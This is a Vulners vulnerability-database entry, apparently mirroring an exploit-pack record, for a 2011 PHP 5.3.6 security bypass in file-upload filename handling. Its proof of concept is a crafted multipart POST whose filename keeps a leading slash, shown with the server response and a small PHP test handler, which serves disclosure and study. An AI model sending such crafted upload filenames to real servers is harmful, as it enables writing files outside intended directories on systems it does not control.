Lucene search
K

PHP 5.3.6 - Security Bypass

🗓️ 14 Jun 2011 00:00:00Reported by Krzysztof KotowiczType 
exploitpack
 exploitpack
👁 18 Views

PHP 5.3.6 Security Bypass vulnerability allows arbitrary file creation from root directory, aiding further attacks

Code
source: https://www.securityfocus.com/bid/48259/info

PHP is prone to a security-bypass vulnerability.

Successful exploits will allow an attacker to create arbitrary files from the root directory, which may aid in further attacks.

PHP 5.3.6 is vulnerable; other versions may also be affected.

HTTP Request:
====
POST /file-upload-fuzz/recv_dump.php HTTP/1.0
host: blog.security.localhost
content-type: multipart/form-data; boundary=----------ThIs_Is_tHe_bouNdaRY_$
content-length: 200

------------ThIs_Is_tHe_bouNdaRY_$
Content-Disposition: form-data; name="contents"; filename="/anything.here.slash-will-pass";
Content-Type: text/plain

any
------------ThIs_Is_tHe_bouNdaRY_$--

HTTP Response:
====
HTTP/1.1 200 OK
Date: Fri, 27 May 2011 11:35:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-Length: 30
Connection: close
Content-Type: text/html

/anything.here.slash-will-pass

PHP script:
=====
<?php
if (!empty($_FILES['contents'])) {  // process file upload
    echo $_FILES['contents']['name'];
    unlink($_FILES['contents']['tmp_name']);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Jun 2011 00:00Current
7.4High risk
Vulners AI Score7.4
18